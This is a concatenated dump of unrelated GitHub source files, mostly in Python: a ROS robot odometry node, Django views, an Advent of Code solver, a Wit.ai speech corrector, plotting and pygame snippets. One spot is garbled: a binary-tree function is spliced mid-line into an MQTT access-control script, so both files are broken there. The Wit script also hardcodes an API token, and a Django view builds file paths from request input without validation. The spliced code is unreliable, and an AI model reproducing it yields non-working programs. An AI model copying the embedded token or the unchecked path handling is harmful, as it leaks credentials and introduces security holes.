self._m1_front_enc_prev = self._roboclaw_front_stats.m1_enc_val\n self._m2_front_enc_prev = self._roboclaw_front_stats.m2_enc_val\n # if self._roboclaw_rear_stats is not None:\n # self._m1_rear_enc_prev = self._roboclaw_rear_stats.m1_enc_val\n # self._m2_rear_enc_prev = self._roboclaw_rear_stats.m2_enc_val\n self._last_odom_time: Time = self.get_clock().now()\n self._last_cmd_vel_time: Time = self.get_clock().now()\n\n def _cmd_vel_callback(self, msg: Twist):\n \"\"\"Called by the Twist cmd_vel message subscriber.\n\n Parameters:\n msg (Twist): Twist command velocity message\n \"\"\"\n with self._cmd_vel_lock:\n self._x_linear_cmd = msg.linear.x\n self._z_angular_cmd = msg.angular.z\n self._last_cmd_vel_time = self.get_clock().now()\n self.get_logger().debug(f\"CMD Vel - X: {msg.linear.x} | Z: {msg.angular.z}\")\n\n def _roboclaw_stats_callback(self, position: str, stats: Stats):\n \"\"\"Called by the Roboclaw Stats message subscriber\n\n Parameters:\n stats (Stats): Roboclaw Stats message\n callback_args (List): Arguments to this function (i.e. 
\"front\" or \"rear)\n \"\"\"\n with self._stats_lock:\n if \"front\" in position:\n self._roboclaw_front_stats = stats\n elif \"rear\" in position:\n self._roboclaw_rear_stats = stats\n else:\n self.get_logger().warn(\"roboclaw_stats_callback: Unsure which stats to read\")\n self.get_logger().warn(f\"callback_args: {position}\")\n self.get_logger().debug(\n f\"Stats received: t=({stats.header.stamp.sec}.{stats.header.stamp.nanosec}), frame_id=({stats.header.frame_id}), \"\n f\"m1_enc_val=({stats.m1_enc_val}), m2_enc_val=({stats.m2_enc_val}), \"\n f\"m1_enc_qpps=({stats.m1_enc_qpps}), m2_enc_qpps=({stats.m2_enc_qpps})\"\n )\n\n def _base_loop_callback(self):\n # ------------------------------------------------------------\n # If the last command was over deadman_secs ago, stop the base\n # ------------------------------------------------------------\n if (\n self._last_cmd_vel_time is None or\n (self.get_clock().now() - self._last_cmd_vel_time).nanoseconds / 1e9 > self._deadman_secs\n ):\n self._x_linear_cmd = 0.0\n self._z_angular_cmd = 0.0\n\n # ---------------------------------\n # Calculate and send motor commands\n # ---------------------------------\n with self._cmd_vel_lock:\n x_linear_cmd = self._x_linear_cmd\n z_angular_cmd = self._z_angular_cmd\n\n # Clamp the velocities to the max configured for the base\n x_linear_cmd = max(-self._max_x_lin_vel, min(x_linear_cmd, self._max_x_lin_vel))\n z_angular_cmd = max(-self._max_z_ang_vel, min(z_angular_cmd, self._max_z_ang_vel))\n\n cmd = calc_create_speed_cmd(\n x_linear_cmd, z_angular_cmd,\n self._wheel_dist, self._wheel_radius, self._wheel_slip_factor,\n self._ticks_per_rotation, self._max_drive_secs, self._max_qpps, self._max_accel\n )\n self.get_logger().debug(f\"Publishing: {cmd}\")\n self._speed_cmd_pub.publish(cmd)\n\n # -------------------------------\n # Calculate and publish Odometry\n # -------------------------------\n\n if self._roboclaw_front_stats is None:\n self.get_logger().info(\"Insufficient roboclaw stats received, skipping odometry calculation\")\n return\n\n with self._stats_lock:\n # Calculate change in encoder readings\n m1_front_enc_diff = self._roboclaw_front_stats.m1_enc_val - self._m1_front_enc_prev\n m2_front_enc_diff = self._roboclaw_front_stats.m2_enc_val - self._m2_front_enc_prev\n # m1_rear_enc_diff = self._roboclaw_rear_stats.m1_enc_val - self._m1_rear_enc_prev\n # m2_rear_enc_diff = self._roboclaw_rear_stats.m2_enc_val - self._m2_rear_enc_prev\n\n self._m1_front_enc_prev = self._roboclaw_front_stats.m1_enc_val\n self._m2_front_enc_prev = self._roboclaw_front_stats.m2_enc_val\n # self._m1_rear_enc_prev = self._roboclaw_rear_stats.m1_enc_val\n # self._m2_rear_enc_prev = self._roboclaw_rear_stats.m2_enc_val\n\n # Since we have a two Roboclaw robot, take the average of the encoder diffs\n # from each Roboclaw for each side.\n # m1_enc_diff = (m1_front_enc_diff + m1_rear_enc_diff) / 2\n # m2_enc_diff = (m2_front_enc_diff + m2_rear_enc_diff) / 2\n m1_enc_diff = m1_front_enc_diff\n m2_enc_diff = m2_front_enc_diff\n\n # We take the nowtime from the Stats message so it matches the encoder values.\n # Otherwise we would get timing variances based on when the loop runs compared to\n # when the stats were measured.\n # Since we have a two Roboclaw robot, take the latest stats timestamp from either\n # Roboclaw.\n front_stamp = self._roboclaw_front_stats.header.stamp\n # rear_stamp = self._roboclaw_rear_stats.header.stamp\n nowtime = rclpy.time.Time.from_msg(front_stamp)\n\n x_linear_v, y_linear_v, z_angular_v = 
calc_base_frame_velocity_from_encoder_diffs(\n m1_enc_diff, m2_enc_diff, self._ticks_per_rotation,\n self._wheel_radius, self._wheel_dist, self._wheel_slip_factor,\n self._last_odom_time, nowtime\n )\n\n# ----------\n # self.get_logger().info(f\"BASENODE pos x: {self._world_x}, y: {self._world_y}, th: {self._world_theta}\")\n # self.get_logger().info(f\"BASENODE v's x_lin: {x_linear_v}, y_lin: {y_linear_v}, z_ang: {z_angular_v}\")\n# ----------\n\n time_delta_secs = (nowtime - self._last_odom_time).nanoseconds / 1e9\n self._last_odom_time = nowtime\n\n odom = calc_odometry_from_base_velocity(\n x_linear_v, y_linear_v, z_angular_v,\n self._world_x, self._world_y, self._world_theta,\n time_delta_secs, nowtime,\n self._base_frame_id, self._world_frame_id\n )\n\n# ----------\n # self.get_logger().info(f\"{odom.pose.pose.orientation}\")\n# ----------\n\n self._odom_pub.publish(odom)\n\n # Update world pose\n self._world_x = odom.pose.pose.position.x\n self._world_y = odom.pose.pose.position.y\n self._world_theta = yaw_from_odom_message(odom)\n\n # -----------------------------------------\n # Calculate and broacast tf transformation\n # -----------------------------------------\n if self._publish_odom_tf:\n quat = odom.pose.pose.orientation\n# ----------\n # self.get_logger().info(f\"quat: {quat}\")\n# ----------\n t = TransformStamped()\n t.header.stamp = nowtime.to_msg()\n t.header.frame_id = self._world_frame_id\n t.child_frame_id = self._base_frame_id\n t.transform.translation.x = self._world_x\n t.transform.translation.y = self._world_y\n t.transform.translation.z = 0.0\n t.transform.rotation.x = quat.x\n t.transform.rotation.y = quat.y\n t.transform.rotation.z = quat.z\n t.transform.rotation.w = quat.w\n self._tf_broadcaster.sendTransform(t)\n\n self._last_odom_time = nowtime\n\n self.get_logger().debug(\n \"World position: [{}, {}] heading: {}, forward speed: {}, turn speed: {}\".format(\n self._world_x, self._world_y, self._world_theta,\n self._x_linear_cmd, self._z_angular_cmd\n )\n )\n\n\ndef main(args=None):\n\n # Setup the ROS node\n rclpy.init(args=args)\n node = BaseNode()\n\n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n pass\n except Exception:\n node.get_logger().fatal(\"Unhandled exeption...printing stack trace then shutting down node\")\n node.get_logger().fatal(traceback.format_exc())\n\n # Shutdown and cleanup\n rclpy.shutdown()\n\n\nif __name__ == \"__main__\":\n main(args=sys.argv)\n","repo_name":"sheaffej/r2b2-base","sub_path":"r2b2_base/base_node.py","file_name":"base_node.py","file_ext":"py","file_size_in_byte":16905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26553460021","text":"class Node:\n def __init__(self, data):\n self.left = None\n self.right = None\n self.data = data\n self.temp = 0 \n \ndef swap_node(root):\n if root:\n swap_node(root.left)\n if prev!=None and root.data fecha_salida:\n print(f\"Salio:{fecha}\")\n return False\n if fecha > fecha_salida:\n print(f\"Entro:{fecha}\")\n return True\n except TypeError:\n print(\"Comparacion no permitida.\")\n print(f\"Salio:{fecha}\")\n return False\nprint(separador)\nprint(\"ACCESO\")\nprint(separador)\ntry:\n client = mqtt.Client(cliente)\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(broker_ip, port, 60)\n print(\"Acerca la tarjeta al lector.\")\n print(f\"Conectando a {broker_ip}:{port}\")\n client.loop_forever()\nexcept Exception as err:\n print(err)\n print(f\"No es posible conectarse al Broker 
{broker_ip}:{port}\")\n print(\"Revisa tu conexión\")\nexcept KeyboardInterrupt:\n print(\"\\n\")\n print(\"Finalizando programa.\")","repo_name":"ElierRosales/Capstone-project-Administrador-de-laboratorios","sub_path":"MongoDB/buscarUID.py","file_name":"buscarUID.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"221025738","text":"import ipdb\nipdb.set_trace()\nipdb.set_trace(context=5) # 이곳에서 프로그램을 중단.\n # 이하 5줄을 보여준다. \nipdb.pm() #debug\nipdb.run('x[0] = 3')\nresult = ipdb.runcall(function, arg0, arg1, kwarg='foo')\nresult = ipdb.runeval('f(1,2) - 3')\n\nprint(result)\n\n","repo_name":"iamnamki/python-TIL","sub_path":"ipdbTest.py","file_name":"ipdbTest.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23873587871","text":"import json\nimport os\nfrom os.path import isfile, isdir\n\nfrom channels import Channel, Group\nfrom django.http import HttpResponse\nfrom django.views import View\n\nfrom command.lib import parsing_scripts\nfrom command.lib.utils import file_system\nfrom command.lib.utils.decorators import forward_exception_to_http, forward_exception_to_channel, check_permission\nfrom command.lib.utils.permission import Permission\n\n\nclass ScriptTreeView(View):\n\n def get(self, request, operation, *args, **kwargs):\n method = getattr(self, operation)\n return method(request, *args, **kwargs)\n\n def post(self, request, operation, *args, **kwargs):\n method = getattr(self, operation)\n return method(request, *args, **kwargs)\n\n @staticmethod\n @forward_exception_to_http\n def get_script_names(request, *args, **kwargs):\n values = request.POST['values']\n\n comp_id = request.POST['compendium_id']\n channel_name = request.session['channel_name']\n view = request.POST['view']\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n sub_dirs = [d for d in os.listdir(base_path) if isdir(os.path.join(base_path, d))]\n all = {}\n for sub_dir in sub_dirs:\n full_path = os.path.join(base_path, sub_dir)\n onlyfiles = [{'script_name': f} for f in os.listdir(full_path) if\n isfile(os.path.join(full_path, f)) and f != '__init__.py']\n all[sub_dir] = onlyfiles\n result = all.get(values, all)\n\n return HttpResponse(json.dumps({'success': True, 'data': result}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n @check_permission(Permission.USE_PYTHON_EDITOR)\n def update_script_file(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n comp_id = request.POST['compendium_id']\n channel_name = request.session['channel_name']\n view = request.POST['view']\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n old_file_name = base_path + values['path']\n new_file_name = os.path.join(os.path.dirname(old_file_name), values['file_name'])\n if not new_file_name.endswith('.py'):\n new_file_name += '.py'\n os.rename(old_file_name, new_file_name)\n Group(\"compendium_\" + str(comp_id)).send({\n 'text': json.dumps({\n 'stream': view,\n 'payload': {\n 'request': {'operation': 'refresh'},\n 'data': None\n }\n })\n })\n return HttpResponse(json.dumps({'success': True}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n @check_permission(Permission.USE_PYTHON_EDITOR)\n def delete_script_file(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n comp_id = 
request.POST['compendium_id']\n channel_name = request.session['channel_name']\n view = request.POST['view']\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n full_path = base_path + values['file_name']\n os.remove(full_path)\n Group(\"compendium_\" + str(comp_id)).send({\n 'text': json.dumps({\n 'stream': view,\n 'payload': {\n 'request': {'operation': 'refresh'},\n 'data': None\n }\n })\n })\n return HttpResponse(json.dumps({'success': True}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n @check_permission(Permission.USE_PYTHON_EDITOR)\n def create_script_file(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n comp_id = request.POST['compendium_id']\n channel_name = request.session['channel_name']\n view = request.POST['view']\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n full_path = base_path + values['path']\n if os.path.isfile(full_path):\n full_path = os.path.dirname(full_path)\n file_name = values['file_name']\n if not file_name.endswith('.py'):\n file_name += '.py'\n full_path = os.path.join(full_path, file_name)\n open(full_path, 'a').close()\n Group(\"compendium_\" + str(comp_id)).send({\n 'text': json.dumps({\n 'stream': view,\n 'payload': {\n 'request': {'operation': 'refresh'},\n 'data': None\n }\n })\n })\n return HttpResponse(json.dumps({'success': True}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n @check_permission(Permission.USE_PYTHON_EDITOR)\n def save_script(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n full_path = base_path + values['file_name']\n source = values['source']\n with open(full_path, 'w') as script_file:\n script_file.write(source)\n return HttpResponse(json.dumps({'success': True}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n def read_script_file(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n full_path = base_path + values['file_name']\n\n with open(full_path, 'r') as script_file:\n data = script_file.read()\n\n return HttpResponse(json.dumps({'success': True, 'data': data}),\n content_type=\"application/json\")\n\n\n @staticmethod\n @forward_exception_to_channel\n def read_script_tree(channel_name, view, request, user):\n channel = Channel(channel_name)\n\n path = os.path.dirname(parsing_scripts.__file__)\n path_hierarchy = file_system.path_hierarchy(path, base_path=path, name_filter=request['filter']) # get only subdirectories\n path_hierarchy = [d for d in path_hierarchy['children'] if not d['leaf']] # without files\n path_hierarchy.append({'leaf': True, 'path': '/README', 'text': 'README'})\n channel.send({\n 'text': json.dumps({\n 'stream': view,\n 'payload': {\n 'request': request,\n 'data': path_hierarchy\n }\n })\n })\n","repo_name":"marcomoretto/command","sub_path":"command/lib/views/script_tree_view.py","file_name":"script_tree_view.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"43954954350","text":"import seaborn as sns\nfrom matplotlib.patches import Rectangle\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Button\nimport numpy as np\n\n\ndef plot_colour_legend(input_data):\n ## NOT IN USE AT THE MOMENT, still updating\n \n #generates the colour legend for plots with unique 
configs <= 5\n \n #config_data should be the list of lists generated after the Omega code. Each list should be 13 length representing pressures 0 - 12, and T lists representing number of temperatures considered\n \n #this function is called inside heatmap_plot_legendonly()\n \n unique_config_names = set([item for sublist in input_data for item in sublist])\n labels_legend = list(unique_config_names)\n \n color_legend = ['blue','pink','yellow'] #hardcoded for now\n \n handles_legend = [Rectangle((0,0),1,1,color=color) for color in color_legend]\n \n return plt.legend(handles_legend,labels_legend,title='O* Coverages',loc='upper right',bbox_to_anchor=(1.1,1))\n\n\ndef heatmap_plot(config_data,T_parameters=list,P_parameters=list,colorbar_option = False):\n ##input data, config_data should be a list of T lists. Each list should be P length representing number of pressure data points, and T lists representing number of temperatures considered\n \n ## T_parameters and P_parameters are lists that contain plotting parameters, lists are used to contain them to make function inputs neater. \n \n ## colorbar_option is False by default if unique configs <= 5 (see main for logic loop). If unique configs > 5, will be set to True. This is because colorbar will only be shown if number of configs is more than 5 (a significant number). \n \n ## NOTE: this function does not use the colorbar because there are <5 unique configuration names.\n \n #Axis analyzer: determine if the plot is too tall to plot properly on matplotlib.\n ## If plot is too tall, place longer axis on x axis and plot horizontally.\n ## However, there is still a limit as to the plot size that can be handled by computer before the annotations become unreadable.\n \n #calculate the number of points for T and P axis respectively.\n T_points = len(config_data)\n P_points = len(config_data[0])\n unique_configs = len(set([item for sublist in config_data for item in sublist]))\n \n # If loop Logic\n ## whichever has more data points (T/P), that means the axis will be longer. In that case make the longer axis the x axis, adjust figure size accordingly.\n if T_points > P_points:\n data_heatmap = np.array(config_data).T[::-1] #invert due to heatmap plotting style of matplotlib\n \n fig, ax = plt.subplots(figsize = (T_points,P_points))\n\n sns.heatmap(data=data_heatmap,linecolor = 'black', linewidths=0.5, cmap='plasma',annot=True,fmt='',cbar=colorbar_option, square=True,ax=ax)\n\n #Custom colour legend settings (hardcoded for now)\n #legend = plot_colour_legend(config_data)\n \n #plt.gca().add_artist(legend)\n \n ## custom tick locations setter to avoid tick location errors. Variable names are different to avoid confusion with other plot, but the logic remains.\n ## Reasoning: As number of data points increases, matplotlib's default number of ticks are insufficient to fit our larger number of axis labels, resulting in an error returned when finer T-P/P-T plots are desired. 
\n \n origin_x_ticks_T = plt.gca().get_xticks()\n origin_y_ticks_P = plt.gca().get_yticks()\n custom_x_ticks_T = np.linspace(origin_x_ticks_T[0],origin_x_ticks_T[-1],T_points)\n custom_y_ticks_P = np.linspace(origin_y_ticks_P[0],origin_y_ticks_P[-1],P_points)\n \n #x and y labels/ticks & title settings\n ax.set_ylabel(\"Natural Log of Pressure Ratio of CO2/CO\")\n ax.set_yticks(custom_y_ticks_P,labels=np.linspace(P_parameters[1],P_parameters[0],P_parameters[2])) ## Pressure values are in descending order due to the way matplotlib plots the y axis.\n ax.set_xlabel(\"Temperature (K)\")\n ax.set_xticks(custom_x_ticks_T,labels=np.linspace(T_parameters[0],T_parameters[1],T_parameters[2])) \n ax.set_title(\"O* coverage concentration over T and P\") \n \n elif T_points <= P_points:\n data_heatmap = np.array(config_data)[::-1]\n\n fig, ax = plt.subplots(figsize=(P_points,T_points))\n\n sns.heatmap(data=data_heatmap,linecolor = 'black', linewidths=0.5, cmap='plasma',annot=True,fmt='',cbar=colorbar_option, square=True,ax=ax)\n\n #Custom colour legend settings (hardcoded for now)\n #legend = plot_colour_legend(config_data)\n \n #plt.gca().add_artist(legend)\n \n ## custom tick locations setter to avoid tick location errors\n \n ## Reasoning: As number of data points increases, matplotlib's default number of ticks are insufficient to fit our larger number of axis labels, resulting in an error returned when finer T-P/P-T plots are desired. \n\n origin_x_ticks = plt.gca().get_xticks()\n origin_y_ticks = plt.gca().get_yticks()\n custom_x_ticks = np.linspace(origin_x_ticks[0],origin_x_ticks[-1],P_points)\n custom_y_ticks = np.linspace(origin_y_ticks[0],origin_y_ticks[-1],T_points)\n \n #x and y labels/ticks & title settings\n ax.set_xlabel(\"Natural Log of Pressure Ratio of CO2/CO\")\n ax.set_xticks(custom_x_ticks,labels=np.linspace(P_parameters[0],P_parameters[1],P_parameters[2]))\n ax.set_ylabel(\"Temperature (K)\")\n ax.set_yticks(custom_y_ticks,labels=np.linspace(T_parameters[1],T_parameters[0],T_parameters[2])) ## Temperature values are in descending order due to the way matplotlib plots the y axis.\n ax.set_title(\"O* coverage concentration over T and P\")\n\n \n plt.tight_layout()\n plt.show()","repo_name":"tituslje/Python_Mini_Showcases","sub_path":"Computational_Catalysis_Research/python src/heatmap_plot_funcs_V3_inprog.py","file_name":"heatmap_plot_funcs_V3_inprog.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"9342934241","text":"import unittest\nimport common.HTMLTestRunner_cn as Runner\n\ncasePath = \"./case\"\nrule = \"test_*.py\"\n\ndiscover = unittest.defaultTestLoader.discover(start_dir=casePath, pattern=rule)\nprint(discover)\n\nwith open(\"report.html\", \"wb\") as f:\n runner = Runner.HTMLTestRunner(stream=f, title=\"报告名\", description=\"报告描述\", retry=1)\n runner.run(discover)\n","repo_name":"hyy784022927/test-selenium","sub_path":"Auto_web/run_all.py","file_name":"run_all.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17147608784","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Album\nfrom .forms import AlbumForm\n\n# Create your views here.\n\n\ndef list_albums(request):\n albums = Album.objects.all()\n # goes to the DataBase and gets all instznces of the\n # model Album (Django ORM) = query\n return render(request, 
'albums/index.html', {'albums': albums})\n # pass data to the template using the context dictionary\n\n\n# def get_album_by_priority(request, priority):\n# albums = Album.objects.filter(priority=priority)\n# return render(request, 'albums/index.html', {'albums': albums})\n\n\ndef add_album(request):\n if request.method == 'POST':\n album_form = AlbumForm(request.POST, request.FILES)\n if album_form.is_valid():\n album_form.save()\n return redirect('home')\n form = AlbumForm()\n return render(request, 'albums/add_album.html', {'form': form})\n\n\ndef detail_album(request, pk):\n album = get_object_or_404(Album, pk=pk)\n return render(request, 'albums/detail_album.html', {'album': album})\n\n\ndef edit_album(request, pk):\n albums = get_object_or_404(Album, pk=pk)\n if request.method == 'POST':\n album_form = AlbumForm(request.POST, request.FILES, instance=albums)\n if album_form.is_valid():\n album_form.save()\n return redirect('home')\n form = AlbumForm(instance=albums)\n return render(request, 'albums/edit_album.html', {'form': form, 'pk': pk})\n\n\ndef delete_album(request, pk):\n album = get_object_or_404(Album, pk=pk)\n if request.method == 'POST':\n album.delete()\n return redirect('home')\n return render(request, 'albums/delete_album.html')\n","repo_name":"Momentum-Team-17/django-music-MichaelGreason","sub_path":"albums/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36489701388","text":"f = open(\"15/input.txt\", \"r\")\nmaxX = 0\nmaxY = 0\nminX = 0\nminY = 0\nsensors = []\nbeacons = []\nfor line in f:\n line = line.strip().split(\" \")\n sX = int(line[2].replace(\",\",\"\").split(\"=\")[1])\n sY = int(line[3].replace(\":\",\"\").split(\"=\")[1])\n bX = int(line[8].replace(\",\",\"\").split(\"=\")[1])\n bY = int(line[9].replace(\",\",\"\").split(\"=\")[1])\n distance = abs(bX - sX) + abs(bY - sY)\n sensors.append((sX,sY, distance))\n if (bX,bY) not in beacons:\n beacons.append((bX,bY))\n maxX = max([maxX, sX, bX])\n maxY = max([maxY, sY, bY])\n minX = min([minX, sX, bX])\n minY = min([minY, sY, bY])\n\n\nprint(\"sensors\", len(sensors))\n\ndef getInRow(Y):\n inRow = []\n for b in beacons:\n (x, y) = b\n if y == Y:\n inRow.append((x,y))\n return inRow\n\ndef getCheckSensors(Y):\n checkSensors = []\n for s in sensors:\n (x,y,d) = s\n distance = abs(y - Y)\n if distance <= d:\n checkSensors.append(s)\n return checkSensors\n\n# part 1\ndef countImpossiblePositions(Y):\n inRow = getInRow()\n checkSensors = getCheckSensors()\n positions = 0\n for s in checkSensors:\n (x,y,d) = s\n minX = min(minX,x - d)\n maxX = max(maxX,x + d)\n\n for X in range(minX, maxX + 1):\n if (X,Y) in inRow:\n continue\n for sensor in checkSensors:\n (x,y,d) = sensor\n distance = abs(X - x) + abs(Y - y)\n if distance <= d:\n positions +=1\n break\n return positions\n\n# part2\nsearchRange = 4000000\ndef limitSearchRange():\n minX = searchRange\n minY = searchRange\n maxX = 0\n maxY = 0\n for s in sensors:\n (x, y, d) = s\n maxX = max(maxX, x)\n maxY = max(maxY, y)\n minX = min(minX, x)\n minY = min(minY, y)\n #return (minX, minY, maxX, maxY)\n return (0, 0, 4000000, 4000000)\n\ndef findBeacon():\n (minX, minY, maxX, maxY) = limitSearchRange()\n print(\"range\", minX, maxX,minY, maxY)\n for Y in range(minY, maxY + 1):\n checkSensors = getCheckSensors(Y)\n inRow = getInRow(Y)\n # print(\"checkSensors\", len(checkSensors))\n # print(\"inRow\", len(inRow))\n X = minX\n\n if Y % 
100000 == 0:\n print(Y)\n\n while X < maxX + 1:\n if (X,Y) in inRow:\n continue\n detected = False\n for sensor in checkSensors:\n (x,y,d) = sensor\n distance = abs(X - x) + abs(Y - y)\n if distance <= d:\n detected = True\n #print(X, Y, sensor, distance)\n #print((x - X))\n #print(\"before\", abs(x - X) * 2, d - distance)\n X = X + abs(x - X) * 2 + abs(d - distance)\n #print(\"after\", X)\n break\n if detected == False:\n return (X, Y)\n X = X + 1\n return None\ndetectedBeacon = findBeacon()\n\nprint(\"detected\", detectedBeacon)\nprint(detectedBeacon[0]* 4000000 + detectedBeacon[1] )\n\n# 4399906","repo_name":"nguyenlinhlinh/adventofcode-2022","sub_path":"15/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28943382517","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom wit import Wit\n\nimport sys\nimport rospy\nfrom std_msgs.msg import String\n\naccess_token = 'BMYORVSUUOLBANBF6OMPVJUBC2DCAR2J'\n\nif len(sys.argv) == 2:\n\taccess_token = sys.argv[1]\n\ndef send(request, response):\n print(response['text'])\n\nactions = {\n 'send': send,\n } \n\nclient = Wit(access_token=access_token, actions=actions)\n\nwith open(\"recognized_input.doc\") as f:\n\tdata = f.read()\npossible_inputs = data.splitlines()\nwill_pub = True\n\nclass Speech_Corrector:\n\n\tdef __init__(self):\n\t\tself.text_sub = rospy.Subscriber(\"/wit/init_text\", String, self.callback)\n\t\tself.text_pub = rospy.Publisher('wit/final_text', String, queue_size = 1)\n\n\tdef callback(self, data): #assumes only one part is given, only one location is given\n\t\twords = data\n\t\tdata = str(data).split()[1:]\n\t\tprint(data)\n\n\t\tif 'rooms' in data:\n\t\t\tdata[data.index('rooms')] = str('room')\n\n\t\tmess = client.message(str(words))\n\t\tprint(\"Recieved this message: \" + str(mess))\n\n\t\timportant_info = mess['entities']\n\n\t\tif len(important_info) != 0:\n\t\t\tfor entity in important_info:\n\t\t\t\tprint(entity + \": \" + str(important_info[entity][0]['value']))\n\n\t\t\tpercentage_dict = {}\n\t\t\tfor line in possible_inputs:\n\t\t\t\tmatching = 0\n\t\t\t\tline = line.split()\n\t\t\t\tfor word in line:\n\t\t\t\t\tif word in data:\n\t\t\t\t\t\tmatching += 1\n\t\t\t\t\telif word == \"ROOM\" and 'room' in important_info:\n\t\t\t\t\t\tmatching += 1\n\t\t\t\t\telif word == \"COLOR\" and 'color' in important_info:\n\t\t\t\t\t\tmatching += 1\n\t\t\t\tif (matching/max([len(data), len(line)])) in percentage_dict:\n\t\t\t\t\tpercentage_dict[(matching/max([len(data), len(line)]))].append(line)\n\t\t\t\telse:\n\t\t\t\t\tpercentage_dict[(matching/max([len(data), len(line)]))] = [line]\n\n\t\t\tmax_percent = -1\n\t\t\tmax_percent_val = None\n\t\t\tfor key in percentage_dict:\n\t\t\t\tif key > max_percent:\n\t\t\t\t\tmax_percent = key\n\t\t\t\t\tmax_percent_val = percentage_dict[key][0]\n\n\t\t\tfor i in range(len(max_percent_val)):\n\t\t\t\tword = max_percent_val[i]\n\t\t\t\tif word == \"ROOM\":\n\t\t\t\t\ttry:\n\t\t\t\t\t\tmax_percent_val[i] = str(important_info['room'][0]['value'])\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tprint(\"Didn't quite understand...Can you try again\")\n\t\t\t\t\t\twill_pub = False\n\t\t\t\t\t\tbreak\n\t\t\t\telif word == \"COLOR\":\n\t\t\t\t\ttry:\n\t\t\t\t\t\tmax_percent_val[i] = 
str(important_info['color'][0]['value'])\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tprint(\"Didn't quite understand...Can you try again\")\n\t\t\t\t\t\twill_pub = False\n\t\t\t\t\t\tbreak\n\n\t\t\tif will_pub:\n\t\t\t\tprint(max_percent_val)\n\t\t\t\tself.text_pub.publish(' '.join(max_percent_val))\n\t\telse:\n\t\t\tprint(\"Didn't quite understand...Can you try again\")\n\t\t\t#self.text_pub.publish(' '.join(data))\n\n\ndef main(args):\n corrector = Speech_Corrector()\n rospy.init_node(\"speech_corrector\", anonymous=True)\n\n rospy.spin()\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","repo_name":"brookssj/wit-speech-to-text","sub_path":"speech_to_text_corrector.py","file_name":"speech_to_text_corrector.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6875458967","text":"import pygame\nfrom button import Button\n\n# create display window\nSCREEN_HEIGHT = 500\nSCREEN_WIDTH = 800\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption('Button Demo')\n\n# load button images\nstart_img = pygame.image.load('button_frame_1.png').convert_alpha()\nclicked_img = pygame.image.load('button_frame_1_clicked.png').convert_alpha()\n\n\n# create buttons\nstart_button = Button(100, 200, start_img, 0.8)\nclicked_button = Button(450, 200, start_img, 0.8)\n\nrun = True\nwhile run:\n\n screen.fill((202, 228, 241))\n\n if start_button.draw(screen):\n start_button.raw_image = clicked_img\n print('clicked 1')\n if clicked_button.draw(screen):\n print('clicked 2')\n\n # event handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n pygame.display.update()\npygame.quit()\n\n\n\n","repo_name":"LarsCD/Pygame-RPG","sub_path":"Pygame_Tutorials/pygame_gui_test.py","file_name":"pygame_gui_test.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"16224911814","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#################\n# ALGORITHMS #\n#################\n\ndef bisek(f, a, b, tol=1e-12, n=0):\n \"\"\"\n RECURSIVE\n\n Parameters\n ==========\n f : callable, function to find roots of\n a, b: intervall, in which to search\n tol : convergence tolerance\n n : number steps\n\n Returns\n =======\n a : left border of intervall (in case of convergence, a and b are\n close together)\n n : steps until result\n\n \"\"\"\n # if abs(f(a)) < tol or abs(f(b)) < tol:\n if abs(a-b) < tol or abs(min(f(a), f(b))) < tol:\n return a, n\n c = (a + b) / 2\n if np.sign(f(a)) == np.sign(f(c)):\n return bisek(f, c, b, tol, n+1)\n else:\n return bisek(f, a, c, tol, n+1)\n\n\ndef sekant(f, xn, xm, 